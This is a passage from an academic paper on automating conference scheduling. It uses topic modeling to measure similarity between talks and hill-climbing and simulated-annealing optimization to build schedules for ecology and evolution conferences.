time pressure, that is not easily scaled and can lead to sub-optimal conference schedules (Hillis, 2013). Since conference attendees typically aim to attend those talks most relevant to their interests, the ideal conference schedule will not only ensure similarity of topics within a session, but also avoid topical conflict among concurrent sessions. In practice, identifying similarity among talks is a highly subjective process. Research talks often have several dimensions; a talk presenting an efficient key distribution scheme for asymmetric cryptography is related to key distribution algorithms, network security, and cryptographic algorithms. Talk A might be more similar to talk B on one dimension but more similar to talk C on a different dimension. Depending on their areas of expertise, different organizers might weight those dimensions differently, and the weights of the organizers may or may not be representative of the conference attendees. Even if the measure of similarity were not subjective, ensuring a high level of dissimilarity among concurrent sessions, each with multiple talks, is a challenging task for humans, as it requires perception of the distribution of many points in a highly multidimensional space. This can lead to schedules with conflict between concurrent sessions even when the Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 2/28 https://peerj.com https://doi.org/10.7717/peerjcs.234/fig-1 http://dx.doi.org/10.7717/peerj-cs.234 talks within each individual session appear similar. Ensuring a high level of dissimilarity among concurrent sessions is important to minimize participants having to move between sessions, or having to choose between co-occurring talks of equal interest. Vangerven et al. (2018) also note that dissimilarity between concurrent sessions is important for enabling participants to attend the talks of most interest to them without encountering scheduling conflicts, as might happen when talks of a similar topical nature are scheduled in concurrent sessions. Adding to the complexity of the conference scheduling task is the fact that organizers typically have to accommodate idiosyncratic scheduling constraints due to the travel schedules and other obligations of individual presenters. Efficient and automated data- driven solutions to overcome the problems would be desirable. The conference scheduling problem Imagine a conference with Q talks scheduled across W days with a maximum of N timeslots per day, each with a maximum of Cmax concurrent sessions. A session is defined as a sequence of talks scheduled during one timeslot in one room. The maximum number of talks in a session is predefined by the organizers and does not vary across the schedule. Sessions are considered concurrent when they are scheduled in the same timeslot. Timeslots are non-overlapping. We define the conference scheduling problem as the task of assigning talks to timeslots and concurrent sessions so as to maximize coherence within a session and minimize similarity between concurrent sessions (i.e., those within the same timeslot). In this work, we describe a heuristic solution to the conference scheduling problem that creates optimized conference schedules with multiple concurrent sessions in a fully automated fashion. First, we propose the use of a data-driven machine-learning approach, topic modeling (Wallach, 2006), to infer similarity between talks. We use topic modeling to identify a set of latent topics relevant to the full set of talks being presented at a conference. Each talk can then be represented as a weighted vector of these different topics, and we can compare these vectors as a measure of similarity. Thus, topic modeling provides a principled way to decide upon which dimensions to consider, and how to weigh those dimensions, in measuring similarity (between talks, between sessions, or between talks and sessions). Second, we present a suite of heuristic schedule creation approaches designed to maximize an objective function that quantifies session coherence and dissimilarity between concurrent sessions in a single metric. We explore different strategies to create initial schedules, including a greedy heuristic, random assignment, and Integer Linear Programming. We then explore different stochastic optimization strategies to further improve upon the initial schedules (Spall, 2012), and investigate how the optimality of the initial schedule impacts the final result. We selected a high-performing combination of approaches that improved upon a manually produced schedule for a recently held ecology conference. Using this combination of approaches, we then created an automated schedule for a large evolutionary biology conference that had not yet been held, in collaboration with the conference organizing Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 3/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 committee. The organizing committee made major, manual modifications to produce the final schedule that was used. After the evolutionary biology conference was held, we conducted an experiment where biologists with expertise in that field were presented with samples of the concurrent sessions from both the machine-generated and manually-modified schedules in order to elicit their subjective opinions about session coherence and conflict among concurrent sessions. This provided an evaluation of how well the discrimination ratio captured the topic dimensions that mattered to experts in the field who would be representative of conference attendees. Related work Surprisingly, given the pervasive exposure of academics to the challenges of conference scheduling, there is a relatively small literature on the problem (reviewed in Vangerven et al. (2018)). Bhardwaj et al. (2014) and André et al. (2013) incorporate attendee preferences for talk and session placement in a Community-Informed Conference Scheduling approach (Sampson, 2009; Kim et al., 2013; Chilton et al., 2014). In Sampson (2009), conference attendees submit time preferences for their talk. The scheduling algorithm, a modification of the simulated annealing heuristic, then attempts to accommodate participant preferences using the number of preferences accommodated as the objective function. Similarly, Kim et al. (2013) and Chilton et al. (2014) use community sourced preferences for talk and session placement to guide the scheduling process. Conference attendees are asked to submit their preferences as to which talks should be scheduled with their own talk and which talks belonged in similarly themed sessions that should not be scheduled concurrently to one another. These preferences are encoded into a scheduling interface that is then used by organizers to create and schedule sessions with the aim of maximizing the number of preferences accommodated while resolving author, talk, and session conflicts. In contrast to our approach, the actual scheduling process is manual. Edis & Edis (2013) approach the scheduling problem using an Integer Programming (IP) formulation in which each talk is assigned a topic and talks are assigned to a session so that all talks in the session have the same topic. Houlding & Haslett (2013) describe a clustering algorithm to group similar talks into fixed size clusters (or sessions), using a local objective function that maximizes the similarity of talk pairs assigned to a cluster at each step. To measure similarity between talks, participants are asked to select three relevant sessions for their talk. The co-occurrence frequency of session topics is then used to determine similarity between talks and sessions. Gulati & Sengupta (2004) use an augmented objective function that incorporates a prediction of a talk’s popularity based on reviewer comments and participant preferences of time slots. The goal of the schedule is to maximize session attendance. The work uses a greedy scheduling algorithm, but no empirical results or computational analysis are presented. Ibrahim, Ramli & Hassan (2008) focus on assigning talks to time slots across a number of days in 3 concurrent sessions. Each talk belongs to a field or topic and the goal is avoid scheduling talks of the same topic concurrently. The study presents methods based on combinatorial design theory for three conferences used as case-studies. The study does not address how talks are grouped into sessions. Quesnelle & Steffy (2015) consider an optimization problem that assigns talks to Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 4/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 timeslots and rooms such that scheduling conflicts are minimized while accounting for presenter and room availabilities. Potthoff & Munger (2003) apply Integer Programming to assign sessions to time periods in a way that sessions for each subject area are spread evenly across time slots. Similarly, Nicholls (2007) assign sessions to rooms and time periods to avoid presenters being scheduled in two concurrent sessions while trying to maximize presenter preferences in the schedule. Both of the above assume that the clustering of similar talks into sessions has already been accomplished. Nicholls (2007) and Eglese & Rand (1987) aim to optimize participant satisfaction by collecting participant preferred sessions. In Eglese & Rand (1987), a simulated annealing algorithm assigns sessions to time periods with the aim of minimizing the sum of the weighted violations of session preferences. Le Page (1996) requires participants to provide the number of sessions they would like to attend. They build a conflict matrix containing the number of people that wish to attend both session i and j. The goal is to assign sessions to timeslots such that the sum of conflicts between simultaneous sessions is minimized. Sessions with the same topic must be assigned to the same room. The authors propose a semi-automated heuristic consisting of four steps that was used to schedule a meeting of the American Crystallographic Association. Among the few studies to address the problem of grouping similar talks into sessions were Tanaka, Mori & Bargiela (2002) and Tanaka & Mori (2002). They use a set of user assigned keywords for each talk and use an objective function that is a nonlinear utility function of common keywords. The intuition behind the approach is that papers in the same session have as much overlap in keywords as possible. They use Kohonen’s self organizing maps (Tanaka, Mori & Bargiela, 2002) and a hybrid grouping genetic algorithm (Tanaka & Mori, 2002). Vangerven et al. (2018) present a method that approaches the conference scheduling problem in three phases. The first phase aims to maximize total attendance, based on the participants’ preferences. The second phase tries to minimize the total number of session hops or minimizing the amount of topical overlap between concurrent sessions. The third phase aims to accommodate presenter preferences and availabilities by minimizing the total number of preferences violated. Stidsen, Pisinger & Vigo (2018) approach conference scheduling using a number of optimization models each with a specific objective. Research fields are assigned to buildings with the aim of assigning related areas to buildings physically close to each other. Each session is assigned to one room. Finally, the solution optimizes assignment of sessions to room sizes. Despite these research contributions, the practice of manual scheduling is still widespread, and not all factors that would allow for a practical automated solution have been considered by researchers. Compared to previous work, our approach is novel in its use of topic modeling to measure talk similarity in multiple dimensions, stochastic optimization of a global objective function that ensures both similarity within a session and disparity between concurrent sessions, and the lack of a need for human intervention. Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 5/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 METHODS We first provide a description of the different parameters and variables (‘Preliminaries’) used through ‘Methods’. Then, we present details about creating the corpus of documents (‘Creating the corpus for topic modeling) for topic modeling along with topic modeling algorithms used (‘Topic modeling’). Next, we describe how similarity between talks and sessions will be computed using outputs from the topic model (‘Computing similarity between talks and sessions). An objective function called the Discrimination Ratio to quantify the similarity of talks within a session vs. disparity between concurrent sessions will be presented (‘An objective function for conference scheduling ’An objective function for conference scheduling’). Finally, we outline heuristic approaches for creating initial schedules (‘Creation of initial schedules’) and for optimizing the initial schedules (‘Stochastic optimization’). Preliminaries A conference schedule is composed of W days, each with N timeslots, with a total of Q talks. Each timeslot is further divided into a maximum of Cmax concurrent sessions. Two sessions are considered to be concurrent if the starting and ending time of the sessions are the same. The number of concurrent sessions in any given timeslot i is represented by Ci. Each session can contain a maximum of Tmax talks. A session is a sequence of talks scheduled during one timeslot in one room. For a given session j, the number of talks in the session is represented by Tj. Talks in a particular timeslot and a particular session can be referred to in the order in which they’re scheduled. ti,j,k represents the kth talk in session j of timeslot i. The topic modeling algorithm takes as input the number of topics (G) to be generated from the corpus of Q talks. The algorithm outputs a vector representation (EVi) of each talk as a weighted vector over the G topics. The vector contains the probabilistic relevance of each topic to a talk. For example, Vi,1 is the probabilistic relevance of topic 1 to talk ti (the ith talk in a session). A pairwise similarity matrix (M) is computed from the above vector representation that contains the cosine similarity (S) between vectors ( EV1, EV2) of every pair of talks in the corpus. The cosine similarity, S, of two vectors has a minimum of -1 and a maximum of 1. An objective function, Discrimination Ratio (D), is defined as the ratio of the mean talk similarity within a session (Sw) to the mean talk similarity between concurrent sessions (Sb) across the full schedule. Initial schedules can be created using the Random, Greedy, or ILP approaches (‘Creation of initial schedules’). These approaches take the number of days in the conference (W ), number of timeslots per day (N), maximum number of concurrent sessions in a timeslot (Cmax), maximum number of talks in each concurrent session (Tmax), and the pairwise talk similarity matrix (M). We present two variants each of a Hill Climbing (HC) and a Simulated Annealing (SA) algorithm that further optimize the initial schedules. For the HC and SA approaches, we experiment with a version (HCA, SAA) that optimizes the objective function directly and another (HCA, SAA) that splits the optimization into two stages - first maximizing within-session similarity and then minimizing between-session similarity. All four variants Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 6/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 Table 1 Parameters and variables used in the topic modeling, schedule creation, and optimization ap- proaches. Parameter Description I Input starting schedule created using the Random, Greedy, or Integer Linear Programming (ILP) approaches. D Discrimination ratio N Number of timeslots in a schedule Ni Timeslot i Cmax Maximum number of concurrent sessions in a timeslot C Number of concurrent sessions Ci Number of concurrent sessions in timeslot i Tmax Maximum number of talks in a session T Number of talks Tj Number of talks in session j Q Number of talks in a schedule ti,j,k kth talk in session j of timeslot i S( EV1, EV2) Cosine similarity between the vector representations of two talks Sw Mean intra-session similarity of a schedule Sb Mean inter-session similarity of a schedule M Pairwise talk similarity matrix Y Number of seed talks for the Greedy algorithm X Number of clusters created by the Kruskal’s algorithm Xi ith Kruskal’s cluster TXi Number of talks in cluster Xi AXi Attractor talk for cluster i Z Initial temperature Zi Temperature at the ith swap. Z0 =50,000. α Constant set to 0.99 R Number of parallel optimizations runs for an optimization algorithm e Number of maximum swaps for an optimization algorithm W Number of days in a conference L Dictionary of scheduling constraints G Number of topics in the topic model Vi,j Probabilistic relevance of topic j to talk ti (HCA, HCB, SAA, SAB) take a starting schedule (I), the number of parallel optimization runs (R), the maximum number of swaps (e), and a pairwise talk similarity matrix (M). The approaches can optionally take a list of scheduling constraints encoded as a dictionary (L). In addition, the SA versions (SAA SAB) take an initial temperature (Z) and a constant (α=0.99). These parameters are further defined in ‘Simulated annealing’. For ease of reference, the parameters and variables are listed in Table 1. Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 7/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 Creating the corpus for topic modeling The corpus of documents that is input to the topic model is the set of talks for a conference. In our implementation, each document included the title and abstract for a single talk. To ensure that the corpus only contained meaningful words that reflect the semantic content of talks, stemming and stop word removal were applied. Stemming reduces variants of words to their base or root form (Lovins, 1968; Porter, 2001; Porter, 1980), making it easier for the topic modeling algorithm to recognize words with the same meaning. Stop words are commonly used words (such as ‘and’, ‘it’, and ‘the’) that have little value with respect to the meaning of the text (Fox, 1989). Python’s Natural Language Toolkit (NLTK - https://www.nltk.org) provides a set of 179 commonly used english words that was used as the initial stop word list. For the second conference, Evolution 2014, domain experts on the conference organizing committee added additional stop words, leading to a total of 952 stop words. Topic modeling We used Latent Dirichlet Allocation (LDA), a generative probabilistic model often used to describe collections of text corpora and one of the most widely used topic modeling algorithms (Blei, Ng & Jordan, 2003). LDA models each document as a finite mixture over an underlying set of latent topics, and each latent topic as a probabilistic mixture over relevant words. The model assumes Dirichlet priors over the latent topics in a document and relevant words within a topic. One of the input parameters to the LDA algorithm is the number of topics to identify from the corpus. Several preliminary topic models were created using different numbers. We developed a metric, the Match Percentage, to compare the fit of different models. For each model, the top two words from each of the top three topics of a talk were used to create a set of six keywords. The fraction of keywords found within the title and abstract was computed for each talk and the Match Percentage was computed as the mean of this fraction across all talks, expressed as a percentage. The topic model with the highest Match Percentage was chosen for subsequent analyses. While there are automated metrics, such as perplexity (Blei & Lafferty, 2005), to evaluate topic models, studies that have tested these metrics of evaluating topic models have reported that inferences based on these measures were negatively correlated with human perception (Chang et al., 2009; Chang & Blei, 2009). These studies also suggest that topic models should be chosen by human analysis of coherence of topics inferred by a model, words in topics etc. instead of trying to optimize likelihood based measures (Chang & Blei, 2009). Computing similarity between talks and sessions LDA outputs a representation of each talk in the corpus as a weighted vector over all the latent topics. In a model with G topics, the vector EVi of talk ti is defined as EVi=(Vi,1,Vi,2,...,Vi,G) (1) where i is the talk number Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 8/28 https://peerj.com https://www.nltk.org http://dx.doi.org/10.7717/peerj-cs.234 Vi,1 is the probabilistic relevance of topic 1 to talk ti From this, a pairwise similarity matrix, M, is computed by calculating the cosine similarity (S) of the two vectors, EV1 and EV2, for every pair of talks in the corpus. S( EV1, EV2)= ∑G j=1V1,jV2,j√∑G j=1(V1,j) 2 √∑G j=1(V2,j) 2 . (2) An objective function for conference scheduling We introduce an objective function called the Discrimination Ratio, D, to quantify in one measure the similarity of talks within each session and the disparity between talks in concurrent sessions. D is defined as the ratio of the mean within-session similarity to the mean between-session similarity across the full schedule. D is higher (>1) when the mean within-session similarity is higher as compared to mean between-session similarity in a schedule. Lower D values (<1) indicate that the mean within-session similarity is lower as compared to mean between-session similarity in a schedule. D is 1 when the mean within-session similarity is same as the mean between-session similarity. The mean within-session similarity, Sw, is the mean of the pairwise similarities between all the talks within each session. Sw = ∑N i=1 ∑Ci j=1 ∑Tj−1 k=1 ∑Tj l=k+1S(ti,j,k,ti,j,l)∑N i=1 ∑Ci j=1 ( Tj 2 ) (3) where N is the number of timeslots in the schedule, Ci is number of concurrent sessions in timeslot i, Tj is number of talks in session j, and S(ti,j,k,ti,j,l) (from Eq. (3)) is the cosine similarity between talk k in timeslot i, session j and talk l in timeslot i, session j. The mean between-session similarity, Sb, is the mean of the pairwise similarities between all the talks in different concurrent sessions. Sb= ∑N i=1 ∑Ci j=1 ∑Tj k=1 ∑Ci l=j+1 ∑Tl m=1S(ti,j,k,ti,l,m)∑N i=1 ∑Ci j=1 ∑Tj k=1 ∑Ci l=j+1 ∑Tl m=11 (4) The Discrimination Ratio is defined as D=Sw/Sb. D is inspired by other commonly used metrics used to evaluate the quality of clusters generated by clustering algorithms, such as k-means. Such commonly used metrics include the Error Sum of Squares (SSE)—the sum of the squared differences between each observation and its cluster’s mean (Celebi, Kingravi & Vela, 2013), Intercluster Distance (Gonzalez, 1985)—the sum of the squared distances between each cluster’s centroid, or Intracluster Distance—the sum of the squared distances between an item and its cluster’s centroid. Creation of initial schedules We consider three approaches for the creation of initial schedules: random, Greedy, and Integer Linear Programming (ILP). Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 9/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 Random The Random assignment algorithm provides a baseline against which to compare the performance of approaches that explicitly optimize the objective function. Given a set of talks and scheduling parameters as in ‘Preliminaries’, this algorithm assigns talks to sessions through sampling with replacement with no consideration of talk similarities or the value of the objective function. Greedy The Greedy assignment algorithm generates a semi-optimal schedule for further stochastic optimization. In addition to the parameters in ‘Preliminaries’, the algorithm requires a set of Y seed talks that are selected based on an input threshold of minimum dissimilarity between each other. First, the algorithm finds a session for each seed talk such as to maximize the objective function. Next, the rest of the talks are assigned to sessions by choosing the most locally optimal solution at each step. Integer linear programming We cast the problem of scheduling the conference as an Integer Linear Program (ILP) using a variable reduction technique that was solved using AMPL (Gay & Kernighan, 2002) with the CPLEX solver (http://www.cplex.com). An Integer Linear Program (ILP) consists of variables, constraints, and an objective function where some or all of the variables take on integer values (Bosch & Trick, 2005). Non-integer variables have numeric values that are limited to a feasible region by the constraints. The objective function determines the assignment of values to the variables that results in an optimal solution. Both the constraints and the objective function must be linear in the variables. In our implementation, a heuristic pre-processing step first groups the talks into X clusters of similar talks using a modified version of Kruskal’s algorithm (Kruskal, 1956), a greedy algorithm that is used to find a minimum spanning tree from a weighted graph of nodes. In this work, nodes represent talks while edge weights represent pairwise talk similarity. We use a modification of Kruskal’s algorithm to find a number of disjoint maximum-weight spanning trees from the graph. Each disjoint spanning tree is a cluster that groups similar talks while the spanning trees are sufficiently distant from each other. At the beginning of the algorithm, each talk forms its own cluster. At each iteration of the algorithm, the pair of talks with the highest edge weight (similarity score) is selected. If the two talks are in separate clusters, the clusters are merged to form a bigger cluster. The algorithm is terminated as soon as X disjoint and distant clusters of similar talks are created. A representative talk called the attractor (AXi), is then chosen from each of the X clusters. The aim is to produce a set of initial input talks for the ILP that are highly different from each other, while ensuring that each attractor has many other talks similar to it. We choose as the attractor the talk that has the highest similarity to all other talks in its cluster. If there are multiple talks that qualify as attractors, one of those talks is chosen randomly. Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 10/28 https://peerj.com http://www.cplex.com http://dx.doi.org/10.7717/peerj-cs.234 We calculate a fit score (F) for each talk tj in cluster Xi as follows. F(tj,Xi)=max TXi k=1S(tj,tk) : j 6=k (5) where TXi is the number of talks in cluster Xi The talk tj with the maximum value of F is chosen as the attractor for cluster Xi. This list of attractors is then input to the ILP, which optimally assigns one attractor to each concurrent session in the schedule and assigns talks to sessions so as to maximize the sum of similarities between the attractor and all the other talks in that session. In addition, the ILP requires the following constraints: each session i is assigned no more than Tmax talks, exactly Ci attractors must be assigned to each timeslot Ni, and each talk must be assigned to only one session. We made no effort to ensure distinctness of the initial schedules either within or between the three approaches. Stochastic optimization We developed two variants each of a Hill Climbing algorithm and a Simulated Annealing algorithm to further improve upon the initial schedules (obtained from the Random, Greedy, and ILP approaches) by iteratively proposing swaps in the positions of talks in the schedule. The Hill Climbing (HC) approaches accept solutions from a swap only when they increase the discrimination ratio, and are thus susceptible to being trapped in local optima. By contrast, the simulated annealing (SA) approaches will accept solutions that decrease D with a certain probability, and thus have the potential/possibility to escape local optima (Kirkpatrick, Gelatt & Vecchi, 1983). Each optimization algorithm takes one or more initial schedules as input and spawns R parallel optimization runs to produce R optimized schedules at the end of execution. If the input schedule is Random, each parallel run starts with an independently generated schedule, while if the input schedule is a Greedy or an ILP schedule, all parallel runs operate on the same input. The schedule with the highest discrimination ratio among the R optimized schedules is chosen as the output of the algorithm. The input parameters to the optimization approaches are given in ‘Preliminaries’. Simulated annealing For simulated annealing, we used the Kirkpatrick acceptance probability function (Eq. (6)) to determine the probability of accepting a solution resulting from a swap (Kirkpatrick, Gelatt & Vecchi, 1983). K(Dj,Di)= { 1 if Dj <Dir e−(Dj−Di)/Zi otherwise (6) where Di and Dj are the discrimination ratios of the schedule under the proposed swap and after the last accepted swap, respectively; Z is the initial ‘‘temperature’’, and Zi is the current temperature at timestep i defined as Zi=Zi−1α. Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 11/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 The decreasing temperature values reduce the probability of accepting worse solutions as the number of swaps increases. Since the algorithm might accept worse solutions, the best solution encountered at any point of time is stored to be reported at the end of execution. Sequential optimization In working with the organizing committee for the evolution conference, we observed that users were more sensitive to maximizing coherence within a session than disparity between concurrent sessions. In order to emulate this aspect of human scheduling, we developed variants of the HC and SA approaches that split the optimization algorithm into two sequential regimes, the first optimizing for within-session similarity alone and the second for between-session disparity alone. Between-session disparity is optimized by proposing a swap of two randomly selected sessions in each iteration. This has no effect on within-session similarity since swapping is conducted on sessions and not talks. The sequential optimization regimes are stopped when further swapping does not result in improvement. We refer to the versions of the HC and SA approaches in which D is optimized directly throughout as HCA and SAA, respectively, and the approaches in which the schedule is first optimized for within-session similarity as HCB and SAB, respectively. See Algorithms 1–4 for pseudocode describing the four optimization approaches. Scheduling constraints In practice, a conference will typically have constraints that restrict the sessions or timeslots a talk can be placed in. Reasons may include talks competing for awards that must scheduled early in the conference in order to allow time for judging; presenters with multiple talks that cannot be scheduled in concurrent sessions within the same timeslot; presenters who are scheduled to arrive at the conference after it begins or before it is finished; or requests for complementary talks to be scheduled in the same session. These constraints can be accommodated by the optimization approaches described above by requiring them to be satisfied in any solution obtained. In our implementation, such scheduling constraints were encoded as a dictionary (L) that maps each talk to a set of sessions in which the talk can be placed without violating any scheduling constraints. For example, in a schedule with five sessions (labeled 1 through 5), if a constraint prevents talk ti from being scheduled in session 5, the constraint would be encoded in the dictionary as L[ti]={1,2,3,4}. Each proposed swap was checked for constraint violations before being accepted. If there is no feasible solution due to conflicting constraints, no solution is returned. RESULTS The datasets for the two conferences used in this work, Ecology 2013 and Evolution 2014, are summarized in Table 2. We first tested our topic modeling, schedule creation and optimization approaches on select concurrent sessions from Ecology 2013. The manually created schedule for this conference gave us a point of comparison for the automated schedules we generated. Although our ultimate goal was to apply our methods to the Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 12/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 Table 2 Parameters for the Ecology 2013 and Evolution 2014 conferences. Parameter Ecology 2013 Evolution 2014 Number of days (W) 5 4 Number of talks to be scheduled (Q) 324 1,014 Number of timeslots (N) 8 16 Maximum number of concurrent sessions per timeslot (Cmax) 5 14 (W1,W2,W3), 9 (W4) Maximum number of talks per session (Tmax) 10 5 Scheduling constraints to be accommodated None 244 Evolution 2014 conference, previous Evolution conferences could not be used for testing since talk abstracts were not a part of submissions in previous years. The main structural difference between the two datasets is that no scheduling constraints were available for Ecology 2013. Algorithm 1: Hill Climbing optimization algorithm (HCA) Input: Initial schedule Output: Optimized schedule set current schedule to input schedule; set e to maximum number of swaps; while discrimination ratio (D) increases or e > 0 do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute D of updated schedule; if updated D > current D then accept changes; set current schedule to updated schedule; end else discard changes; end e=e−1; end return current schedule; Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 13/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 Algorithm 2: Hill Climbing optimization algorithm (HCB) Input: Initial schedule Output: Intra-session optimized schedule set current schedule to input schedule; set e to maximum number of swaps; while mean intra-session similarity (Sw) increases or e > 0 do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute Sw of updated schedule; if updated Sw > current Sw then accept changes; set current schedule to updated schedule; end else discard changes; end e=e−1; end set Intra-session optimized schedule to current schedule; Input: Intra-session optimized schedule Output: Optimized schedule set e to maximum number of swaps; set current schedule to input schedule; while mean inter-session similarity (Sb) decreases or e > 0 do select two sessions from the input schedule at random; swap the two sessions; if updated schedule does not violate constraints then compute Sb of updated schedule; if updated Sb < current Sb then accept changes; set current schedule to updated schedule; end else discard changes; end e=e−1; end return current schedule ; Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 14/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 Ecology 2013 Topic models were created using the LDA algorithm for 60, 80, 100, and 120 topics on the corpus of 324 talks. Each topic model was evaluated based on two criteria: (1) Match Percentage and (2) manual examination of the topics and topic words associated with each talk. We obtained Match Percentages of 70.5% (for 60 topics), 74.6% (80), 75.2% (100) and 75% (120). The topic model with 100 topics was judged to be the best model for the data. Subsequently, this topic model was used to compute a talk similarity matrix that contained a similarity score for all pairs of talks in the dataset. The talk similarity matrix was computed using cosine similarity between the topic relevance vectors of any two talks (Eq. (2)). Algorithm 3: Simulated Annealing optimization algorithm (SAA) Input: Initial schedule Output: Optimized schedule set e to maximum number of swaps; set best D to D of input schedule; set current schedule, best schedule to input schedule; while discrimination ratio (D) increases or e > 0 do select two talks from the input schedule at random; swap the two talks; if updated schedule does not violate constraints then compute D of updated schedule; compute probability of accepting updated schedule using Kirkpatrick accep- tance probability function; r=random number between 0 and 1; if acceptance probability > r then accept changes; set current schedule to updated schedule; compute D of updated schedule; if updated D > current D then set best schedule to updated schedule end else discard changes; end else discard changes; end e=e−1; end return best schedule; Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 15/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 Algorithm 4: Simulated Annealing optimization algorithm (SAB) Input: Initial schedule Output: Optimized schedule set e to maximum number of swaps; set best Sw to Sw of input schedule; set current schedule, best schedule to input schedule; while mean inter-session similarity (Sw) increases or e > 0 do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute Sw of updated schedule; compute probability of accepting updated schedule using Kirkpatrick acceptance probability function; r=random number between 0 and 1; if acceptance probability > r then accept changes; set current schedule to updated schedule; if updated Sw > best Sw then best Sw = updated Sw; best schedule = updated schedule; end else discard changes; end else discard changes; end e=e−1; end set Intra-session optimized schedule = best schedule; Input: Intra-session optimized schedule Output: Optimized schedule set e to maximum number of swaps; set current schedule, best schedule to input schedule; set best Sb to Sb of input schedule; while mean inter-session similarity (Sb) decreases or e > 0 do select two talks from the current schedule at random; swap the two talks; if updated schedule does not violate constraints then compute Sb of updated schedule; compute probability of accepting updated schedule using Kirkpatrick acceptance probability function; r=1-(random number between 0 and 1); if acceptance probability > r then accept changes; set current schedule to updated schedule; if updated Sb < best Sb then best Sb = updated Sb; best schedule = updated schedule; end else discard changes; end else discard changes; end e=e−1; end return best schedule; Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 16/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 Random Manual Greedy ILP Schedule creation algorithm M e a n d is c ri m in a ti o n ra ti o Starting schedules HCA SAA HCB SAB Figure 2 Mean discrimination ratio of the starting and final Ecology 2013 schedules for the four opti- mization approaches applied to each of the Random, Manual, Greedy, and ILP initial schedules. Error bars show two standard errors of the mean discrimination ratio among the 50 starting or final schedules. Full-size DOI: 10.7717/peerjcs.234/fig-2 Fifty each of Random, Greedy, and ILP schedules were created in addition to the manually created Ecology 2013 schedule. The schedule with the highest discrimination ratio among the 50 runs was taken to be the solution for each combination of starting schedule and stochastic optimization algorithm. The discrimination ratios of the initial and final optimized schedules are shown in Fig. 2. Both the Greedy and ILP initial schedules outperformed the Manual schedule while the Random schedule did not. All four optimization approaches improved upon the initial schedules. The highest relative improvement was seen on the Random schedules (about eight-fold) while a two-fold improvement was seen relative to the other three initial schedules, yet the final schedules had very similar discrimination ratios irrespective of the initial schedule. Among the optimization approaches, the overall best results were obtained with SAA, closely followed by HCA, on all initial schedules. Thus, the two approaches optimizing directly and continuously for D outperformed those that sequentially optimized for within-session similarity followed by between-session disparity. We compared the D distributions using a Student’s t-test across 50 final schedules created HC and SA approaches with different initial schedules to investigate if there are any significant differences in performances. We found statistically significant differences between SA and HC versions for the majority of starting schedules at the Bonferroni- corrected threshold of α=0.002 (Table 3, rows 2–9). No significant differences were found between HCA and SAA with a Random starting schedule and between HCB and SAB with an ILP starting schedule (Table 3, rows 2,9). We also compared the performance of A and B versions of the HC and SA approaches with the four initial schedules. Statistically significant differences were found between A Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 17/28 https://peerj.com https://doi.org/10.7717/peerjcs.234/fig-2 http://dx.doi.org/10.7717/peerj-cs.234 Table 3 Comparison of HC and SA approaches, and, A and B variants of HC and SA with four differ- ent initial schedules. Comparisons are made on the distributions of D for the 50 final Ecology 2013 opti- mized schedules produced by each approach. Shown are p-values from two-sided un-paired t-tests at the Bonferroni-corrected threshold of α=0.002 (experiment-wide α=0.05 for n=24). Initial Schedule Comparison p Comparing HC with SA versions Random HCA vs. SAA 0.32 Manual HCA vs. SAA 4.56e−07 Greedy HCA vs. SAA 1.01e−05 ILP HCA vs. SAA 0.0002 Random HCB vs. SAB 7.28e−43 Manual HCB vs. SAB 2.77e−50 Greedy HCB vs. SAB 6.12e−38 ILP HCB vs. SAB 0.084 Comparing A with B variants Random HCA vs. HCB 9.03e−55 Manual HCA vs. HCB 2.09e−58 Greedy HCA vs. HCB 1.30e−52 ILP HCA vs. HCB 2.36e−54 Random SAA vs. SAB 4.18e−23 Manual SAA vs. SAB 4.07e−23 Greedy SAA vs. SAB 5.90e−23 ILP SAA vs. SAB 2.36e−54 and B versions for both HC and SA approaches across all four starting schedules (Table 3, rows 11–18). Evolution 2014 Topic models were created from the corpus of 1,014 talks using the LDA algorithm for 50, 100, 150, and 250 topics. We obtained Match Percentages of 72.4% (for 50 topics), 76.8% (100), 79.3% (150) and 77.2% (250). Based on the match percentage of the four models and manual inspection of the generated topics, the model with 150 topics was chosen to compute talk similarity for the Evolution 2014 corpus. During the test runs conducted on the Ecology dataset, we observed that there was little variation between different parallel runs within the same algorithm (Fig. 2). Knowing this, and considering the larger size of the Evolution 2014 dataset, we reduced the number of parallel runs for each optimization algorithm to 10. Since the Ecology 2013 results showed that the initial schedule had no discernible affect on the final optimized schedule, we only report the results of optimization on Random starting schedules with and without constraints. The results are shown in Fig. 3. The relative ordering of the approaches is identical to Ecology 2013, with the highest performance shown by SAA followed closely by HCA. 